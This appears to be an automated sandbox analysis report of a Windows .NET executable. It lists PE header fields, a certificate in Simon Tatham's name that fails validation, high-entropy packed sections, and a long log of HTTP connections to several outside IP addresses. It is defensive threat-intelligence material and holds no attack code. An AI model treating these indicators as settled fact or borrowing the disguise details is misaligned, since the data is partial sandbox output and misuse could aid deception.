                                                                        TLSH:86151260119BE901C8D10B7049A3D3F59B709DC9F921C30BABEAAFFBBC7615629543E4
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................@............@................................
                                                                        Icon Hash:099bce4dd131078e
                                                                        Entrypoint:0x4db9ca
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6747CC9F [Thu Nov 28 01:51:27 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                        Subject Chain
                                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                        Version:3
                                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                        Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdb978 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xdc000 | 0x59f0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xdfa00 | 0x3608 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe2000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xd9a50 | 0xd9c00 | 2f5c3171a2cf43d8a80bd69fcf68ac68 | False | 0.9284093355338691 | data | 7.844297233774946 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xdc000 | 0x59f0 | 0x5a00 | e4d307e65c721571a751df028819110d | False | 0.9299479166666667 | data | 7.857965853300758 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xe2000 | 0xc | 0x200 | a3df6e9d0fbf2b5699259f4a06b99c1f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xdc100 | 0x531a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.968083106138949 |
| RT_GROUP_ICON | 0xe142c | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xe1450 | 0x3a0 | data | | | 0.41810344827586204 |
| RT_MANIFEST | 0xe1800 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Nov 28, 2024 09:14:32.413949013 CET8049866104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:32.414043903 CET4986680192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:32.416944027 CET4986680192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:32.536914110 CET8049866104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:38.263391018 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:38.383388042 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:38.383589983 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:38.398060083 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:38.518027067 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.904886007 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.920085907 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.920264959 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.920327902 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.920341969 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.920378923 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.920403957 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.921283007 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.921294928 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.921324015 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.921336889 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.922418118 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.922430038 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.922458887 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.922472000 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.923332930 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.923345089 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.923392057 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.924310923 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.924359083 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:40.923702002 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:41.043865919 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:41.043976068 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:41.058192015 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:41.178227901 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540067911 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540267944 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540281057 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540436029 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.541014910 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541028023 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541070938 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.541826010 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541838884 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541874886 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.542694092 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.542706966 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.542717934 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.542742968 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.542759895 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.561001062 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.660480976 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.660612106 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.660664082 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.664664030 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.626600027 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.746576071 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:43.748912096 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.855289936 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.975274086 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:43.975351095 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186304092 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186531067 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186543941 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186578035 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.187294960 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.187308073 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.187342882 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.188066959 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.188105106 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.188108921 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.188981056 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.188992977 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.189047098 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.189646959 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.189702988 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.307002068 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.307147026 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.307197094 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.357852936 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.378256083 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.378309011 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.378437996 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.378508091 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.382643938 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.382688999 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.382833958 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.382877111 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.391057968 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.391114950 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.391267061 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.391319990 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.396764040 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.396807909 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.433916092 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.553932905 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:46.554014921 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.649779081 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.769723892 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:47.789602995 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:47.789736986 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:47.796698093 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:47.796698093 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:47.916702986 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:53.216738939 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:53.336685896 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:53.336776018 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:53.351852894 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:53.472069025 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:54.482003927 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:54.482114077 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:54.858167887 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:54.978060961 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:55.878699064 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:55.998743057 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:55.999212027 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:56.013505936 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:56.133533001 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:57.153053045 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:57.153121948 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:57.529612064 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:57.649643898 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:58.548533916 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:58.668549061 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:58.668651104 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:58.689878941 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:58.809887886 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:58.809994936 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:59.860920906 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:59.864733934 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:00.201436996 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:00.321719885 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:01.222023010 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:01.342303038 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:01.342395067 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:01.353698969 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:01.473712921 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:02.459662914 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:02.459670067 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:02.459849119 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:02.462517977 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:02.582473993 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:07.793289900 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:07.919365883 CET80499523.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:07.919492006 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:07.934731960 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:08.054827929 CET80499523.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:09.062696934 CET80499523.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:09.062743902 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:09.435842991 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:09.555727005 CET80499523.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:10.454963923 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:10.574920893 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:10.576744080 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:10.616044044 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:10.736169100 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:11.765135050 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:11.765224934 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:12.123353958 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:12.243777990 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:13.142864943 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:13.262811899 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:13.262897015 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:13.284480095 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:13.404417992 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:13.404602051 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:14.795351028 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:14.915690899 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:14.915757895 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:15.818326950 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:15.938239098 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:15.942745924 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:15.980632067 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:16.100992918 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:17.045238018 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:17.045254946 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:17.045440912 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:17.048515081 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:17.168514967 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:22.419326067 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:22.539345026 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:22.540868998 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:22.555114031 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:22.675128937 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873202085 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873219967 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873284101 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873450041 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:24.064662933 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.080657959 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.200664043 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:25.200741053 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.222577095 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.342677116 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.487931013 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.488049984 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.488291979 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:26.488455057 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.491477013 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:26.732775927 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:27.751461983 CET4999980192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:16:24.881225109 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:24.881311893 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:24.896471024 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:25.016680002 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:26.085532904 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:26.085570097 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:26.085633993 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:26.404601097 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.423460007 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.545871019 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:27.545958996 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.565336943 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.686666965 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:28.752336025 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:28.752351999 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:28.752418995 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:29.076404095 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:30.096688032 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:30.216711998 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:30.216979980 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:30.232676029 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:30.352854013 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:30.352876902 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:31.380040884 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:31.380093098 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:31.380140066 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:31.732722044 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:32.751912117 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:32.871934891 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:32.872029066 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:32.883420944 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:33.003460884 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075501919 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075728893 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075742960 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075876951 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.076488018 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.076514959 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.076548100 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.077272892 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.077286959 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.077404022 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.078151941 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.078170061 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.078190088 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.078825951 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.078885078 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.195972919 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.196161032 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.196289062 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.200058937 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.248198986 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.285759926 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.285862923 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.288250923 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.288311005 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.288434982 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.288678885 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.295603037 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.295717955 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.296807051 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.416754007 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:39.894968033 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:40.015450001 CET8050023161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:40.015559912 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:40.030689955 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:40.150796890 CET8050023161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:41.545133114 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:41.665680885 CET8050023161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:41.665739059 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.570051908 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.690270901 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:42.691138029 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.705497026 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.825557947 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:43.983979940 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:43.983995914 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:43.984006882 CET8050024161.97.142.144192.168.2.5
